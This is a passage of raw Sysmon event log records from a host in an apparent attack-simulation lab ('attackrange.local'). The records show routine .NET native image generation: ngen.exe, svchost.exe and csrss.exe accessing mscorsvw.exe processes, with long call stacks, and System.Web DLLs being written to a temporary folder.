319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:34.829{08A6967A-45D6-6000-CC02-000000009A01}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\132c-0\System.Web.Entity.Design.dll2021-01-14 13:23:34.829 10341000x80000000000000006967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:34.517{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D6-6000-CC02-000000009A01}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:34.501{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45D6-6000-CC02-000000009A01}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:34.501{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D6-6000-CC02-000000009A01}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:34.360{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D6-6000-CB02-000000009A01}32C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:34.345{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45D6-6000-CB02-000000009A01}32C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:34.345{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D6-6000-CB02-000000009A01}32C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:34.282{08A6967A-45D5-6000-CA02-000000009A01}4220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\107c-0\System.Web.Entity.dll2021-01-14 13:23:34.282 10341000x80000000000000006981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:35.970{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D7-6000-D002-000000009A01}4560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:35.970{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45D7-6000-D002-000000009A01}4560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:35.970{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D7-6000-D002-000000009A01}4560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:35.876{08A6967A-45D7-6000-CF02-000000009A01}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1250-0\System.Web.Extensions.Design.dll2021-01-14 13:23:35.876 10341000x80000000000000006977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:35.251{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D7-6000-CF02-000000009A01}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:35.235{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45D7-6000-CF02-000000009A01}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:35.235{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D7-6000-CF02-000000009A01}4688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:35.095{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D7-6000-CE02-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:35.079{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45D7-6000-CE02-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:35.079{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D7-6000-CE02-000000009A01}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:36.189{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D8-6000-D102-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:36.173{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45D8-6000-D102-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:36.173{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D8-6000-D102-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:37.986{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45D9-6000-D302-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:37.986{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D9-6000-D302-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:37.954{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45D9-6000-D202-000000009A01}3512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:37.939{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45D9-6000-D202-000000009A01}3512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:37.939{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45D9-6000-D202-000000009A01}3512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:37.814{08A6967A-45D8-6000-D102-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9d4-0\System.Web.Mobile.dll2021-01-14 13:23:37.814 10341000x80000000000000007005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:38.642{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45DA-6000-D702-000000009A01}4912C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYS